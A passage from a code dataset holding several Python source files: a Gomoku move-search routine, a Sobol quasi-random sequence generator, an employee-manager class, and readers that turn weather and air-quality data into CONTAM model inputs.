dx, y + 4 * dy):\n weight += values['?*1111?']\n\n if is_enemy(x + dx, y + dy):\n weight += values['?*2?']\n if is_enemy(x + dx, y + dy) and is_enemy(x + 2 * dx, y + 2 * dy):\n weight += values['?*22?']\n if is_enemy(x + dx, y + dy) and is_enemy(x + 2 * dx, y + 2 * dy) and is_enemy(x + 3 * dx, y + 3 * dy):\n weight += values['?*222?']\n if is_enemy(x + dx, y + dy) and \\\n is_enemy(x + 2 * dx, y + 2 * dy) and is_enemy(x + 3 * dx, y + 3 * dy) \\\n and is_enemy(x + 4 * dx, y + 4 * dy):\n weight += values['?*2222?']\n\n return weight\n\ndef UCT(rootstate, maxtime, verbose=False):\n \"\"\" Conduct a UCT search for itermax iterations starting from rootstate.\n Return the best move from the rootstate.\n Assumes 2 alternating players (player 1 starts), with game results in the range [0.0, 1.0].\"\"\"\n\n rootnode = Node(state=rootstate)\n end_time = time.time() + maxtime\n while time.time() < end_time:\n #for i in range(itermax):\n node = rootnode\n state = rootstate.Clone()\n\n # Select\n while node.untriedMoves == [] and node.childNodes != []: # node is fully expanded and non-terminal\n node = node.UCTSelectChild()\n state.DoMove(node.move)\n\n # Expand\n if node.untriedMoves != []: # if we can expand (i.e. 
state/node is non-terminal)\n m = random.choice(node.untriedMoves)\n state.DoMove(m)\n node = node.AddChild(m, state) # add child and descend tree\n\n # Rollout - this can often be made orders of magnitude quicker using a state.GetRandomMove() function\n while state.GetMoves() != []: # while state is non-terminal\n state.DoMove(random.choice(state.GetMoves()))\n\n # Backpropagate\n while node != None: # backpropagate from the expanded node and work back to the root node\n node.Update(state.GetResult(\n node.playerJustMoved)) # state is terminal. Update node with result from POV of node.playerJustMoved\n node = node.parentNode\n\n # Output some information about the tree - can be omitted\n if (verbose):\n print(rootnode.TreeToString(0))\n else:\n print(rootnode.ChildrenToString())\n\n return sorted(rootnode.childNodes, key=lambda c: c.visits)[-1].move # return the move that was most visited\n","sub_path":"ai/group_23.py","file_name":"group_23.py","file_ext":"py","file_size_in_byte":12901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"576263269","text":"from .._discrete_distribution import DiscreteDistribution\nfrom ...util import ParameterError, ParameterWarning\nfrom ..c_lib import c_lib\nimport ctypes\nfrom os.path import dirname, abspath, isfile\nfrom numpy import *\nimport warnings\n\n\nclass Sobol(DiscreteDistribution):\n \"\"\"\n Quasi-Random Sobol nets in base 2.\n \n >>> s = Sobol(2,seed=7)\n >>> s\n Sobol (DiscreteDistribution Object)\n dimension 2^(1)\n randomize 1\n graycode 0\n seed [61615 58564]\n mimics StdUniform\n dim0 0\n >>> s.gen_samples(4)\n array([[0.783, 0.173],\n [0.128, 0.816],\n [0.72 , 0.664],\n [0.316, 0.334]])\n >>> s.set_dimension(3)\n >>> s.gen_samples(n_min=4,n_max=8)\n array([[0.882, 0.932, 0.573],\n [0.035, 0.071, 0.379],\n [0.569, 0.418, 0.036],\n [0.474, 0.593, 0.982]])\n >>> Sobol(dimension=2,randomize=False,graycode=True).gen_samples(n_min=2,n_max=4)\n array([[0.75, 0.25],\n [0.25, 0.75]])\n >>> Sobol(dimension=2,randomize=False,graycode=False).gen_samples(n_min=2,n_max=4)\n array([[0.25, 0.75],\n [0.75, 0.25]])\n \n References:\n\n [1] Marius Hofert and Christiane Lemieux (2019). \n qrng: (Randomized) Quasi-Random Number Generators. \n R package version 0.0-7.\n https://CRAN.R-project.org/package=qrng.\n\n [2] Faure, Henri, and Christiane Lemieux. \n “Implementation of Irreducible Sobol' Sequences in Prime Power Bases.” \n Mathematics and Computers in Simulation 161 (2019): 13–22. Crossref. Web.\n\n [3] F.Y. Kuo & D. Nuyens.\n Application of quasi-Monte Carlo methods to elliptic PDEs with random diffusion coefficients \n - a survey of analysis and implementation, Foundations of Computational Mathematics, \n 16(6):1631-1696, 2016.\n springer link: https://link.springer.com/article/10.1007/s10208-016-9329-5\n arxiv link: https://arxiv.org/abs/1606.06613\n \n [4] D. Nuyens, `The Magic Point Shop of QMC point generators and generating\n vectors.` MATLAB and Python software, 2018. Available from\n https://people.cs.kuleuven.be/~dirk.nuyens/\n\n [5] Paszke, A., Gross, S., Massa, F., Lerer, A., Bradbury, J., Chanan, G., … Chintala, S. \n (2019). PyTorch: An Imperative Style, High-Performance Deep Learning Library. \n In H. Wallach, H. Larochelle, A. Beygelzimer, F. d extquotesingle Alch'e-Buc, E. Fox, & R. Garnett (Eds.), \n Advances in Neural Information Processing Systems 32 (pp. 8024–8035). Curran Associates, Inc. 
\n    Retrieved from http://papers.neurips.cc/paper/9015-pytorch-an-imperative-style-high-performance-deep-learning-library.pdf\n\n    [6] I.M. Sobol', V.I. Turchaninov, Yu.L. Levitan, B.V. Shukhman: \n    \"Quasi-Random Sequence Generators\" Keldysh Institute of Applied Mathematics, \n    Russian Academy of Sciences, Moscow (1992).\n\n    [7] Sobol, Ilya & Asotsky, Danil & Kreinin, Alexander & Kucherenko, Sergei. (2011). \n    Construction and Comparison of High-Dimensional Sobol' Generators. Wilmott. \n    2011. 10.1002/wilm.10056. \n\n    [8] Paul Bratley and Bennett L. Fox. 1988. \n    Algorithm 659: Implementing Sobol's quasirandom sequence generator. \n    ACM Trans. Math. Softw. 14, 1 (March 1988), 88–100. \n    DOI:https://doi.org/10.1145/42288.214372\n    \"\"\"\n    \n    parameters = ['dimension','randomize','graycode','seed','mimics','dim0']\n\n    def __init__(self, dimension=1, randomize='LMS', graycode=False, seed=None, z_path=None, dim0=0):\n        \"\"\"\n        Args:\n            dimension (int): dimension of samples\n            randomize (str/bool): If True, apply digital shift to generated samples.\n                Note: Non-randomized Sobol' sequence includes the origin.\n            graycode (bool): indicator to use graycode ordering (True) or natural ordering (False)\n            seed (int/list): int seed or list of seeds, one for each dimension.\n            z_path (str): path to generating matrices. \n                z_path should be formatted like `gen_mat.21201.32.msb.npy` with name.d_max.m_max.msb_or_lsb.npy\n            dim0 (int): first dimension\n        \"\"\"\n        # initialize c code\n        self.get_unsigned_long_long_size_cf = c_lib.get_unsigned_long_long_size\n        self.get_unsigned_long_long_size_cf.argtypes = []\n        self.get_unsigned_long_long_size_cf.restype = ctypes.c_uint8\n        self.get_unsigned_long_size_cf = c_lib.get_unsigned_long_size\n        self.get_unsigned_long_size_cf.argtypes = []\n        self.get_unsigned_long_size_cf.restype = ctypes.c_uint8\n\n        self.sobol_cf = c_lib.sobol\n        self.sobol_cf.argtypes = [\n            ctypes.c_ulong,  # n\n            ctypes.c_uint32,  # d\n            ctypes.c_ulong,  # n0\n            ctypes.c_uint32,  # d0\n            ctypes.c_uint8,  # randomize\n            ctypes.c_uint8,  # graycode\n            ctypeslib.ndpointer(ctypes.c_uint64, flags='C_CONTIGUOUS'),  # seeds\n            ctypeslib.ndpointer(ctypes.c_double, flags='C_CONTIGUOUS'),  # x (result)\n            ctypes.c_uint32,  # d_max\n            ctypes.c_uint32,  # m_max\n            ctypeslib.ndpointer(ctypes.c_uint64, flags='C_CONTIGUOUS'),  # z (generating matrix)\n            ctypes.c_uint8]  # msb\n        # set parameters\n        self.sobol_cf.restype = ctypes.c_uint8\n        self.set_dimension(dimension)\n        self.set_seed(seed)\n        self.set_randomize(randomize)\n        self.set_graycode(graycode)\n        self.set_dim0(dim0)\n        # set generating matrix\n        if not z_path:\n            self.d_max = 21201\n            self.m_max = 32\n            self.msb = True\n            self.z = load(dirname(abspath(__file__))+'/generating_matricies/sobol_mat.21201.32.msb.npy').astype(uint64)\n        else:\n            if not isfile(z_path):\n                raise ParameterError('z_path `' + z_path + '` not found. 
')\n            self.z = load(z_path).astype(uint64)\n            f = z_path.split('/')[-1]\n            f_lst = f.split('.')\n            self.d_max = int(f_lst[1])\n            self.m_max = int(f_lst[2])\n            msblsb = f_lst[3].lower()\n            if msblsb == 'msb':\n                self.msb = True\n            elif msblsb == 'lsb':\n                self.msb = False\n            else:\n                msg = '''\n                z_path should be formatted like `sobol_mat.21201.32.msb.npy`\n                with name.d_max.m_max.msb_or_lsb.npy\n                '''\n                raise ParameterError(msg)\n        self.errors = {\n            1: 'requires 32 bit precision but system has unsigned int with < 32 bit precision.',\n            2: 'using natural ordering (graycode=0) where n0 and/or (n0+n) is not 0 or a power of 2 is not allowed.',\n            3: 'Exceeding max samples (2^%d) or max dimensions (%d).'%(self.m_max,self.d_max)}\n        self.low_discrepancy = True\n        self.mimics = 'StdUniform'\n        super(Sobol,self).__init__() \n\n    def gen_samples(self, n=None, n_min=0, n_max=8, warn=True):\n        \"\"\"\n        Generate samples\n\n        Args:\n            n (int): if n is supplied, generate from n_min=0 to n_max=n samples. \n                Otherwise use the n_min and n_max explicitly supplied as the following 2 arguments\n            n_min (int): Starting index of sequence.\n            n_max (int): Final index of sequence.\n\n        Returns:\n            ndarray: (n_max-n_min) x d (dimension) array of samples\n        \"\"\"\n        if n:\n            n_min = 0\n            n_max = n\n        if n_min == 0 and self.randomize==False and warn:\n            warnings.warn(\"Non-randomized AGS Sobol sequence includes the origin\",ParameterWarning)\n        if len(self.seed) != self.dimension:\n            self.set_seed(self.seed)\n        n = int(n_max-n_min)\n        x = zeros((n,self.dimension), dtype=double)\n        rc = self.sobol_cf(n, self.dimension, int(n_min), self.dim0, self.randomize, self.graycode, \\\n            self.seed, x, self.d_max, self.m_max, self.z, self.msb)\n        if rc != 0:\n            raise ParameterError(self.errors[rc])\n        return x\n    \n    def set_seed(self, seeds):\n        \"\"\"\n        Reset the seeds\n\n        Args:\n            seeds (int/list/None): new seeds\n        \"\"\"\n        if isinstance(seeds,int) or isinstance(seeds,uint32) or isinstance(seeds,uint64):\n            random.seed(seeds)\n            self.seed = random.randint(0, 100000, size=self.dimension, dtype=uint64)\n        elif isinstance(seeds,list) or isinstance(seeds,ndarray):\n            seeds = array(seeds)\n            l = len(seeds)\n            if l == self.dimension:\n                self.seed = seeds\n            elif l < self.dimension:\n                self.seed = hstack((seeds,random.randint(0, 100000, size=self.dimension-l, dtype=uint64)))\n            else:  # l > self.dimension\n                self.seed = seeds[:self.dimension]\n        elif seeds==None:  # assume seed==None\n            random.seed(None)\n            self.seed = random.randint(0, 100000, size=self.dimension, dtype=uint64)\n        else:\n            msg = \"Sobol' seed must be an int, list of ints, or None.\"\n            raise ParameterError(msg)\n        self.seed = array(self.seed,dtype=uint64)\n    \n    def set_dimension(self, dimension):\n        \"\"\"\n        Reset the dimension\n\n        Args:\n            dimension (int): new dimension\n        \"\"\"\n        self.dimension = dimension\n\n    def set_randomize(self, randomize):\n        \"\"\"\n        Reset the randomization\n\n        Args:\n            randomize (str): randomization type. Either \n                'LMS': linear matrix scramble with digital shift\n                'DS': just the digital shift\n        \"\"\"\n        if randomize==None or (isinstance(randomize,str) and (randomize.upper()=='NONE' or randomize.upper()=='NO')):\n            self.randomize = 0\n        elif isinstance(randomize,bool):\n            self.randomize = int(randomize)\n        elif randomize.upper() in [\"LMS\",\"LINEAR MATRIX SCRAMBLE\"]:\n            self.randomize = 1\n        elif randomize.upper() in [\"DS\",\"DIGITAL SHIFT\"]:\n            self.randomize = 2\n        else:\n            msg = '''\n            Sobol' randomize should be either \n                'LMS' for Linear Matrix Scramble or \n                'DS' for Digital Shift. 
\n            '''\n            raise ParameterError(msg)\n    \n    def set_graycode(self, graycode):\n        \"\"\"\n        Reset the graycode\n\n        Args:\n            graycode (bool): use graycode?\n        \"\"\"\n        self.graycode = graycode\n    \n    def set_dim0(self, dim0):\n        \"\"\"\n        Reset the first dimension\n\n        Args:\n            dim0 (int): first dimension\n        \"\"\"\n        self.dim0 = dim0\n","sub_path":"qmcpy/discrete_distribution/sobol/sobol.py","file_name":"sobol.py","file_ext":"py","file_size_in_byte":10796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"207169169","text":"\"\"\"\n    Managers(manager.py):\n    Purpose: views and edits information about employees reporting to him/her\n    by: Michael Edegware\n    Date: 6/6/2017\n\"\"\"\n# import objects of admin and employee\nfrom admin import Admin\nimport database\nfrom employee import Employee\n\n\n\nclass Manager:\n    # default constructor\n    def __init__(self, manager_id, manager_name, employees_ids=[]):\n        self.manager_id = manager_id\n        self.manager_name = manager_name\n        self.employee_ids = employees_ids\n\n    def __repr__(self):\n        return \"Manager's name:{}\\nNumber of employees: {}\".format(self.manager_name,\n                                                                   int(len(self.employee_ids)))\n\n    def __str__(self):\n        return \"Manager's name:{}\\nNumber of employees: {}\".format(self.manager_name,\n                                                                   int(len(self.employee_ids)))\n\n    # sets the employee's manager, adds the employee to the list of employees,\n    # registers the id via add_id at admin and adds the employee to the database\n    @staticmethod\n    def add_employee(self, employee, admin, c, conn):\n        if admin.is_manager(admin, self.manager_id, employee.manager_name):\n            id_ = employee.id_\n            inp = id_\n            while True:\n                if Admin.add_id(admin, inp, employee, \"employee\"):\n                    break\n                inp = str(input(\"Id is already taken, enter a new one: \"))\n                id_ = inp\n            employee.id_ = id_\n            database.insert_employee(conn, c, employee)\n            self.employee_ids.append(id_)\n\n    # removes the instance of employee from database\n    @staticmethod\n    def remove_employee(self, employee, admin, c, conn):\n        if admin.is_manager(admin, self.manager_id, self.manager_name):\n            id_ = employee.id_\n            if Admin.remove_id(admin, id_, employee, \"employee\"):\n                database.remove_emp(conn, c, id_)\n                self.employee_ids.remove(id_)\n\n    # set current_salary to amount\n    @staticmethod\n    def set_salary(self, amount, employee, admin, c, conn):\n        if admin.is_manager(admin, self.manager_id, self.manager_name):\n            id_ = employee.id_\n            if database.get_information(c, employee.id_) != None:\n                employee.salary_history.append(employee.current_salary)\n                employee.current_salary = amount\n                database.remove_emp(conn, c, id_)\n                database.insert_employee(conn, c, employee)\n\n    # deduct the number of vacation days left by one\n    @staticmethod\n    def deduct_vacation(self, employee, admin, c, conn):\n        if admin.is_manager(admin, self.manager_id, self.manager_name):\n            if database.get_information(c, employee.id_) != None:\n                id_ = employee.id_\n                employee.vacation_balance -= 1\n                database.remove_emp(conn, c, id_)\n                database.insert_employee(conn, c, employee)\n\n    # updates the employee's annual bonus.\n    @staticmethod\n    def update_bonus(self, amount, employee, admin, c, conn):\n        if admin.is_manager(admin, self.manager_id, self.manager_name):\n            id_ = employee.id_\n            if database.get_information(c, employee.id_) != None:\n                employee.annual_bonus = amount\n                database.remove_emp(conn, c, id_)\n                database.insert_employee(conn, c, 
employee)\n\n\n","sub_path":"python_exercise/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"392219472","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 30 14:41:45 2017\n\n@author: Von P. Walden, Washington State University\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nfrom datetime import datetime, timedelta\n\ndef readHouseWeatherData(filename):\n \"\"\"\n This function reads data from a CSV file into a pandas dataframe, df.\n The dataframe can then be written to a CONTAM weather file using function,\n writeContamWeatherFile. \"filename\" should be an absolute filename with a \n directory and a filename.\n \n Written by Von P. Walden\n Washington State University\n Laboratory for Atmospheric Research\n 8 Jul 2019\n \"\"\"\n\n # Read in the data from the csv file\n wth = pd.read_csv(filename, \n parse_dates=[0], \n skiprows=2, \n names=['time', 'Pb', 'Ta', 'RH', 'Wd', 'Ws'], \n index_col='time')\n wth = wth.replace(r'^\\s+$', np.nan, regex=True) # Replace any whitespace/empty variables with nan\n wth = wth.apply(pd.to_numeric) # convert all columns of DataFrame\n wth.Pb = wth.Pb * 100. # Convert from mbar to Pa\n wth.Ta = wth.Ta + 273.15 # Convert from deg C to K\n\n # Conversion from relative humidity to mixing ratio\n # ....http://www.vaisala.com/Vaisala%20Documents/Application%20notes/Humidity_Conversion_Formulas_B210973EN-F.pdf\n A = 6.116441\n m = 7.591386\n Tn = 240.7263\n es = A*10**(m*(wth.Ta.values-273.15)/(wth.Ta.values-273.15+Tn))\n ws = 0.622 * (es/wth.Pb.values)\n w = wth.RH.values * ws * 1000. # Factor of 1000 converts from kg/kg to g/kg.\n\n # Update the data frame with mixing ratios.\n wth['Hr'] = w\n wth.drop(columns = ['RH'], inplace=True)\n \n # Resample the dataframe to 30-minute time steps.\n wth = wth.resample('30T').mean()\n\n return wth\n\ndef readHouseContaminantData(houseDirectory):\n \"\"\"\n This function reads data from CSV files into pandas dataframes, rack,\n pm25 and ptrms. The dataframe can then be written to a CONTAM ctm file \n using function, writeContamWeatherFile. \"houseDirectory\" is the directory \n that contains the outdoor_rack-Table 1.csv, PM2.5-Table 1.csv and \n PTR-MS-Table 1.csv files for the desired house and season.\n \n The data are accessed from the dataframe, df, like:\n\n rack['CO2']\n pm25['PM2.5']\n ptrms['Formaldehyde']\n\n Note that the dataframes provide a multi-index by which one\n can determine both the type of measurements and the units.\n \n Written by Von P. Walden\n Washington State University\n Laboratory for Atmospheric Research\n 18 August 2019\n Updated: 24 August 2019 - Minor changes to how data is returned.\n \"\"\" \n rack = pd.read_csv(houseDirectory+'outdoor_rack-Table 1.csv', header=[0, 1], parse_dates=True, index_col=[0], skipinitialspace=True)\n pm25 = pd.read_csv(houseDirectory+'PM2.5-Table 1.csv', header=[0, 1], parse_dates=True, index_col=[0], skipinitialspace=True)\n ptrms = pd.read_csv(houseDirectory+'PTR-MS-Table 1.csv', header=[0, 1], parse_dates=True, index_col=[0], skipinitialspace=True)\n \n return rack, pm25, ptrms\n\ndef readWRF_CMAQfile(gridFile, dataFile, lat, lon, vrs, eqs, wthFlag):\n \"\"\"\n This function reads data from a WRF CMAQ data file into pandas dataframes,\n ctm and wth. 
The dataframes can then be written to CONTAM contaminant and \n    weather files using functions, writeContamSpeciesFile and \n    writeContamWeatherFile.\n    \n    Written by Von P. Walden\n    Washington State University\n    Laboratory for Atmospheric Research\n    2 Jun 2017\n    Updated: 25 Feb 2019 - Simplified original code created by Kevin Toombs.\n    \"\"\" \n    # Open the WRF GRIDCRO2D file to determine the WRF pixel for lat/lon.\n    GRID = xr.open_dataset(gridFile)\n    ilat, ilon = find_WRF_pixel(GRID.LAT[0,0,:,:].values,GRID.LON[0,0,:,:].values,lat,lon)\n    # Open WRF-CMAQ data file.\n    print('Reading: ', dataFile)\n    DATA = xr.open_dataset(dataFile)\n    # Create a datetime index.\n    datestr = str(DATA.SDATE)\n    date = datetime(int(datestr[0:4]),1,1) + timedelta(int(datestr[4:])-1)\n    time = [date + timedelta(hours=float(t)) for t in DATA.TSTEP]\n    #\n    # ............................... CONTAMINANT DATA ............................\n    #\n    # Create a pandas dataframe with contaminant variables.\n    ctm = pd.DataFrame({},index=time)\n    #ctm = ctm.set_index(pd.DatetimeIndex(ctm.index))\n    \n    for x in range(len(vrs)):\n        vr = vrs.values[x]\n        eq = eqs.values[x]\n        dat = DATA[vr].values[:,0,ilat,ilon]\n        \n        #print(eq)\n        if(eq[-1] == 'S'):\n            air = DATA['AIR_DENS'].values[:,0,ilat,ilon]\n            dat = dat/1000000000/air\n            #dat.apply(lambda x: x/1000000000/AIR_DENS)\n        else:\n            pass\n        split_eq = eq.split('/')\n        mid_split = split_eq[1].split('*')\n        base = float(mid_split[0])\n        snd = float(mid_split[1])\n        thrd = float(split_eq[2])\n        dat = dat / base * snd / thrd\n        \n        \n        ctm[vr] = dat\n\n    # ........................... WEATHER DATA ............................\n    #\n    # Read weather data from WRF-CMAQ data file.\n    if(wthFlag):\n        if('AIR_DENS' in DATA):\n            T = DATA.SFC_TMP.values[:,0,ilat,ilon] + 273.15 # in K\n            P = DATA.AIR_DENS.values[:,0,ilat,ilon]*287.0*T\n            wspd = DATA.WSPD10.values[:,0,ilat,ilon]\n            wdir = DATA.WDIR10.values[:,0,ilat,ilon]\n            # Conversion from relative humidity to mixing ratio \n            # ....http://www.vaisala.com/Vaisala%20Documents/Application%20notes/Humidity_Conversion_Formulas_B210973EN-F.pdf\n            A = 6.116441\n            m = 7.591386\n            Tn = 240.7263\n            es = A*10**(m*(T-273.15)/(T-273.15+Tn))\n            ws = 0.622 * (es/P)\n            w = DATA.RH.values[:,0,ilat,ilon] * ws * 1000. # Factor of 1000 converts from kg/kg to g/kg.\n            \n            # Create a pandas dataframe with meteorological variables.\n            wth = pd.DataFrame({'Ta':T, \n                                'Pb':P,\n                                'Ws':wspd,\n                                'Wd':wdir,\n                                'Hr':w},\n                                index=time)\n        else:\n            wth = pd.DataFrame({})\n    \n    GRID.close()\n    DATA.close()\n    return ctm, wth\n\ndef find_WRF_pixel(latvar,lonvar,lat0,lon0):\n    # Read latitude and longitude from file into numpy arrays\n    # Renamed findWRFpixel from original function, naive_fast, written by Vikram Ravi.\n    latvals = latvar[:]\n    lonvals = lonvar[:]\n    dist_sq = (latvals-lat0)**2 + (lonvals-lon0)**2\n    minindex_flattened = dist_sq.argmin()  # 1D index of min element\n    iy_min,ix_min = np.unravel_index(minindex_flattened, latvals.shape)\n    return int(iy_min),int(ix_min)\n\ndef readNOAA_ISH(USAF, WBAN, year):\n    \"\"\"This function reads data from NOAA ISH data files for U.S.\n       cities used for CONTAM modeling in the EPA indoor air quality\n       project.\n    \n    Input:\n        USAF - USAF station identifier (as a string)\n        WBAN - WBAN station identifier (as a string)\n        year - Desired year, e.g., 2010 (as an integer)\n\n    Written by Von P. 
Walden, Washington State University\n 12 Nov 2017\n\n \"\"\"\n \"\"\"\n isd-history-IAQ.csv\n \"CITY\",\"USAF\",\"WBAN\",\"STATION NAME\",\"CTRY\",\"STATE\",\"ICAO\",\"LAT\",\"LON\",\"ELEV(M)\",\"BEGIN\",\"END\"\n \"Chicago\",\"725300\",\"94846\",\"CHICAGO O'HARE INTERNATIONAL AIRPORT\",\"US\",\"IL\",\"KORD\",\"+41.995\",\"-087.934\",\"+0201.8\",\"19461001\",\"20171107\"\n \"Cincinnati\",\"724210\",\"93814\",\"CINCINNATI/NORTHERN KENTUCKY INTL AP\",\"US\",\"KY\",\"KCVG\",\"+39.044\",\"-084.672\",\"+0269.1\",\"19730101\",\"20171107\"\n \"Nashville\",\"723270\",\"13897\",\"NASHVILLE INTERNATIONAL AIRPORT\",\"US\",\"TN\",\"KBNA\",\"+36.119\",\"-086.689\",\"+0182.9\",\"19510101\",\"20171108\"\n \"Birmingham\",\"722280\",\"13876\",\"BIRMINGHAM INTERNATIONAL AIRPORT\",\"US\",\"AL\",\"KBHM\",\"+33.566\",\"-086.745\",\"+0187.5\",\"19420801\",\"20171107\"\n \"NewYork\",\"725030\",\"14732\",\"LA GUARDIA AIRPORT\",\"US\",\"NY\",\"KLGA\",\"+40.779\",\"-073.880\",\"+0003.4\",\"19730101\",\"20171107\"\n \"Buffalo\",\"725280\",\"14733\",\"BUFFALO NIAGARA INTERNATIONAL AP\",\"US\",\"NY\",\"KBUF\",\"+42.941\",\"-078.736\",\"+0218.2\",\"19420201\",\"20171107\"\n \"Phoenix\",\"722780\",\"23183\",\"PHOENIX SKY HARBOR INTL AIRPORT\",\"US\",\"AZ\",\"KPHX\",\"+33.428\",\"-112.004\",\"+0337.4\",\"19730101\",\"20171107\"\n \"Denver\",\"725650\",\"03017\",\"DENVER INTERNATIONAL AIRPORT\",\"US\",\"CO\",\"KDEN\",\"+39.833\",\"-104.658\",\"+1650.2\",\"19940718\",\"20171107\"\n \"Boston\",\"725090\",\"14739\",\"GEN E L LOGAN INTERNATIONAL AIRPORT\",\"US\",\"MA\",\"KBOS\",\"+42.361\",\"-071.010\",\"+0003.7\",\"19431121\",\"20171107\"\n \"Worcester\",\"725100\",\"94746\",\"WORCESTER REGIONAL AIRPORT\",\"US\",\"MA\",\"KORH\",\"+42.271\",\"-071.873\",\"+0304.8\",\"20100801\",\"20171107\"\n \"LosAngeles\",\"722950\",\"23174\",\"LOS ANGELES INTERNATIONAL AIRPORT\",\"US\",\"CA\",\"KLAX\",\"+33.938\",\"-118.389\",\"+0029.6\",\"19440101\",\"20171107\"\n \"Seattle\",\"727930\",\"24233\",\"SEATTLE-TACOMA INTERNATIONAL AIRPORT\",\"US\",\"WA\",\"KSEA\",\"+47.444\",\"-122.314\",\"+0112.8\",\"19480101\",\"20171107\"\n \"Miami\",\"722020\",\"12839\",\"MIAMI INTERNATIONAL AIRPORT\",\"US\",\"FL\",\"KMIA\",\"+25.791\",\"-080.316\",\"+0008.8\",\"19730101\",\"20171107\"\n \"WashingtonDC\",\"724030\",\"93738\",\"WASHINGTON DULLES INTERNATIONAL AP\",\"US\",\"VA\",\"KIAD\",\"+38.935\",\"-077.447\",\"+0088.4\",\"19730101\",\"20171107\"\n \"Atlanta\",\"722190\",\"13874\",\"HARTSFIELD-JACKSON ATLANTA INTL AP\",\"US\",\"GA\",\"KATL\",\"+33.630\",\"-084.442\",\"+0307.9\",\"19730101\",\"20171108\"\n \"Minneapolis\",\"726580\",\"14922\",\"MINNEAPOLIS-ST PAUL INTERNATIONAL AP\",\"US\",\"MN\",\"KMSP\",\"+44.883\",\"-093.229\",\"+0265.8\",\"19450101\",\"20171107\"\n \"StLouis\",\"724340\",\"13994\",\"LAMBERT-ST LOUIS INTERNATIONAL AP\",\"US\",\"MO\",\"KSTL\",\"+38.753\",\"-090.374\",\"+0161.9\",\"19730101\",\"20171107\"\n \"Dallas\",\"722590\",\"03927\",\"DALLAS/FT WORTH INTERNATIONAL AP\",\"US\",\"TX\",\"KDFW\",\"+32.898\",\"-097.019\",\"+0170.7\",\"19730101\",\"20171107\"\n \"CorpusChristi\",\"722510\",\"12924\",\"CORPUS CHRISTI INTERNATIONAL AIRPORT\",\"US\",\"TX\",\"KCRP\",\"+27.774\",\"-097.512\",\"+0013.4\",\"19460801\",\"20171107\"\n \"\"\"\n\n def pressureCorrection(Ps, Hstn, Tstn):\n \"\"\"Calculate the station pressure in hPa from the sea-level pressure\n (Ps) and the station temperature (Tstn). The correction comes from\n http://www.weather.gov/media/epz/wxcalc/stationPressure.pdf. 
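The formula assumes a standard lapse rate of 6.5 K per km (the 0.0065 factor below). 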
This\n correction was quickly checked against the hypsometric equation and was\n shown to be adequate; see pressureCorrectionTest.py.\n \n Inputs:\n Hstn - elevation (height) of weather station (meters)\n Ps - sea-level pressure in Pa\n Tstn - temperature measured at the weather station (K)\n \n Output:\n Atmospheric pressure at the weather station\n \n Written by Von P. Walden, Washington State University\n 19 November 2017\n \"\"\"\n Lrate = 0.0065*Hstn # LRate is the approximate lapse rate (K m-1)\n return Ps*((Tstn - Lrate)/Tstn)**5.2561\n \n # NOAA ISH parser comes from:\n # https://github.com/haydenth/ish_parser\n from ish_parser import ish_parser\n import pandas as pd\n import numpy as np\n \n # Construct filename of the desired data and read entire file.\n fn = '/Volumes/vonw/data/iaq/NCDC/ish/3505v2' + USAF + '-' + WBAN + str(year) + '.op'\n f = open(fn)\n content = f.read()\n f.close()\n \n # Read the observations from the desired file.\n wf = ish_parser()\n wf.loads(content)\n obs = wf.get_observations()\n\n # Create a datetime index.\n #\n time = np.array([ob.datetime for ob in obs])\n\n # ............................... WEATHER DATA ............................\n #\n Hstn = np.array([ob.elevation for ob in obs]) # meters\n T = np.array([ob.air_temperature.get_numeric() for ob in obs]) # deg C\n Ps = np.array([ob.sea_level_pressure.get_numeric() for ob in obs])*100. # Pa\n Pb = pressureCorrection(Ps, Hstn, T+273.15) # Pa\n wspd = np.array([ob.wind_speed.get_numeric() for ob in obs]) # m s-1 \n wdir = np.array([ob.wind_direction.get_numeric() for ob in obs]) # degrees\n # Conversion from relative humidity to mixing ratio \n # ....http://www.vaisala.com/Vaisala%20Documents/Application%20notes/Humidity_Conversion_Formulas_B210973EN-F.pdf\n A = 6.116441\n m = 7.591386\n Tn = 240.7263\n es = A*10**(m*(T)/(T+Tn))\n ws = 0.622 * (es/Pb)\n w = np.array([ob.humidity.get_numeric() for ob in obs]) * ws * 1000. # Factor of 1000 converts from kg/kg to g/kg.\n # Calculation of air density\n Rd = 287. # Gas constant for dry air; J kg-1 K-1\n rho = Pb / (Rd * (T+273.15))\n # Create a pandas DataFrame that contains the weather data.\n wth = pd.DataFrame({'Ta' : T+273.15,\n 'Pb' : Pb,\n 'Ws' : wspd,\n 'Wd' : wdir,\n 'Hr' : w,\n 'rho' : rho,\n 'elevation': Hstn},\n index=time)\n \n # Resample the dataframe to an hourly time step.\n wth = wth.resample('H').mean()\n \n return wth\n\ndef readMACA(city, year, rcp, model):\n \"\"\"\n This function reads data from a data file of MACA downscaled climate data \n into a pandas dataframe, df. The dataframe can then be written to a CONTAM \n weather file using function, writeContamWeatherFile. It assumes the user\n wants to generate data files for ALL of the 19 contam cities.\n \n Written by Von P. 
Walden\n Washington State University\n Laboratory for Atmospheric Research\n 4 Oct 2017\n \"\"\"\n import pytz\n import ephem\n import sys\n from socket import gethostname\n \n def solar_times(city, date):\n # Sets up the Observer using the city's lat/lon.\n tz = pytz.timezone(city.time_zone)\n o = ephem.Observer()\n o.date = (date + pd.Timedelta('9 hours')).astimezone(pytz.UTC)\n o.lat = city.latitude*np.pi/180.\n o.long = (360.+city.longitude)*np.pi/180.\n o.elev = city.altitude\n sun = ephem.Sun()\n sunrise = o.previous_rising(sun)\n noon = o.next_transit(sun, start=sunrise)\n sunset = o.next_setting(sun, start=noon)\n # Convert from UTC to local time zone.\n local_sunrise = pytz.utc.localize(sunrise.datetime(), is_dst=None).astimezone(tz)\n local_noon = pytz.utc.localize(noon.datetime(), is_dst=None).astimezone(tz)\n local_sunset = pytz.utc.localize(sunset.datetime(), is_dst=None).astimezone(tz)\n return local_sunrise, local_noon, local_sunset\n \n # Read in data files depending on year and RCP.\n hostname = gethostname()\n if hostname.find('petb227a') >= 0: # This is the hostname for gaia.\n directory = '/mnt/data/lima/iaq/maca/'\n elif hostname.find('sila') >= 0:\n directory = '/Volumes/vonw/data/iaq/maca/'\n else:\n print('Not 